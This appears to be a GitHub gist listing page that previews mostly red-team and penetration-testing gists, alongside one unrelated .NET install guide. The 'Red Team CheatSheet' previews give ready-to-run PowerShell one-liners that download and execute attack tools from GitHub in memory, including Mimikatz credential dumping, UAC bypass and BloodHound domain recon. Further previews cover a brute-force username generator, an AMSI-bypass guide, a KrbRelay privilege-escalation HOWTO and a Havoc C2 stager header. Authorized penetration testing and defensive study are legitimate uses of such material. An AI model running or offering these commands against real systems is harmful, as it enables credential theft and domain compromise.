Skip to content

Instantly share code, notes, and snippets.

View jgoosey's full-sized avatar

Jon Goss jgoosey

6 followers · 24 following
View GitHub Profile
@heisters
heisters / hack.sh
Created April 11, 2012 15:57 — forked from erikh/hack.sh
OSX For Hackers
#!/usr/bin/env sh
##
# This is script with usefull tips taken from:
# https://github.com/mathiasbynens/dotfiles/blob/master/.osx
#
# install it:
# curl -sL https://raw.github.com/gist/2108403/hack.sh | sh
#
@superkojiman
superkojiman / namemash.py
Last active May 11, 2024 22:24
Creating a user name list for brute force attacks.
#!/usr/bin/env python3
'''
NameMash by superkojiman
Generate a list of possible usernames from a person's first and last name.
https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active May 23, 2024 14:34
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@m8sec
m8sec / RedTeam_CheatSheet.ps1
Last active May 21, 2024 08:42
Red Team CheatSheet
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@jivoi
jivoi / RedTeam_CheatSheet.ps1
Created July 14, 2018 14:52 — forked from m8sec/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@richlander
richlander / instructions.md
Last active March 24, 2024 14:54
Installing .NET Core 3.0 on Linux ARM64

Installing .NET Core on Linux ARM64

The following intructions can be used to install .NET Core on Linux ARM64.

Pro tip: Check out .NET Core Docker files to determine the exact instructions for installing .NET Core builds, for example .NET Core 3.1 ARM32 SDK Dockerfile.

Installing .NET Core Globally

The following instructions install the latest .NET Core globally. It isn't required to do that, but it provides the best experience.

@tothi
tothi / krbrelay_privesc_howto.md
Last active March 1, 2024 12:26
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@D3Ext
D3Ext / amsi-bypass.md
Last active March 30, 2024 02:23
All methods to bypass AMSI (2022)

AMSI Bypass

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI

However some methods may be detected by the AV but most of them actually work without problem

Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

@GeisericII
GeisericII / Get-LoggedOn.py
Last active May 16, 2024 07:09
Stupid simple script copied and pasted from reg.py/lookupsid and inspired from itm4n's session enum via registry
#!/usr/bin/python3
from __future__ import division
from __future__ import print_function
import re
import codecs
import logging
import time
import argparse
import sys
from impacket import version
@p4p1
p4p1 / stager.c
Created August 2, 2023 16:33
💊💊💊💊
/*
** p4p1: http://p4p1.github.io/
** Created on: Wed 02 Aug 2023 01:37:50 PM CEST
** stager.c
** Description:
** A C stager for havoc.
** Commands for things:
** ./Shhhloader.py -p explorer.exe -ns -sc SysWhispers3 -m QueueUserAPC ../demon.x64.bin
** ./Shhhloader.py -v -p explorer.exe -ns -sc SysWhispers3 -m QueueUserAPC ../demon.x64.bin
** x86_64-w64-mingw32-gcc net_stager.c -o hidden2.exe -lws2_32